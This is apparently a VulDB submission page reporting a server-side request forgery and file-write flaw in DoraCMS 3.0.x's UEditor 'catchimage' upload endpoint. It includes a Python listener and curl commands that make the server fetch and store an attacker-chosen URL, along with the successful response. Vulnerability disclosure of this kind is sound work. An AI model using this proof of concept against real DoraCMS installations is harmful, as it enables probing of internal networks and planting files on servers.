| Titre | DoraCMS 3.0.x SSRF文件落地 |
|---|
| Description | 代码位置:api/v1 路由 (/DoraCMS/server/app/router/api/v1.js:99) catchImage (/源码审计/DoraCMS/server/app/controller/api/uploadFile.js:67)
可以ssrf+文件落地,本地复现
起python服务
```python
from http.server import BaseHTTPRequestHandler, HTTPServer
class H(BaseHTTPRequestHandler):
def do_GET(self):
body = b"INTERNAL_SSRF_MARKER"
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
HTTPServer(("x.x.x.x", 18080), H).serve_forever()
```
本地cms使用docker部署,这里ip改一下
```
export HOST="http://127.0.0.1:8080"
SRC="http://host.docker.internal:18080/poc"
RESP=$(curl -sS -X POST "$HOST/api/v1/upload/ueditor?action=catchimage" \ 13:55
-H 'Content-Type: application/json' \
-d "{\"source\":[\"$SRC\"]}")
echo "$RESP" | jq .
URL=$(echo "$RESP" | jq -r '.list[0].url // empty')
[ -n "$URL" ] && curl -sS "$URL" | strings | grep INTERNAL_SSRF_MARKER
{
"state": "SUCCESS",
"list": [
{
"state": "SUCCESS",
"source": "http://host.docker.internal:18080/poc",
"original": "poc",
"title": "1772085342259128771.png",
"type": ".png",
"url": "http://127.0.0.1:8080/static/upload/images/20260226/1772085342259128771.png",
"size": 20
}
]
}
INTERNAL_SSRF_MARKER
```
可以成功取到文件
|
|---|
| La source | ⚠️ https://demo.doracms.net |
|---|
| Utilisateur | zsmaaa (UID 93294) |
|---|
| Soumission | 26/02/2026 15:44 (il y a 1 mois) |
|---|
| Modérer | 08/03/2026 08:32 (10 days later) |
|---|
| Statut | Dupliqué |
|---|
| Entrée VulDB | 345395 [doramart DoraCMS jusqu’à 3.1 UEditor Remote Image Fetch élévation de privilèges] |
|---|
| Points | 0 |
|---|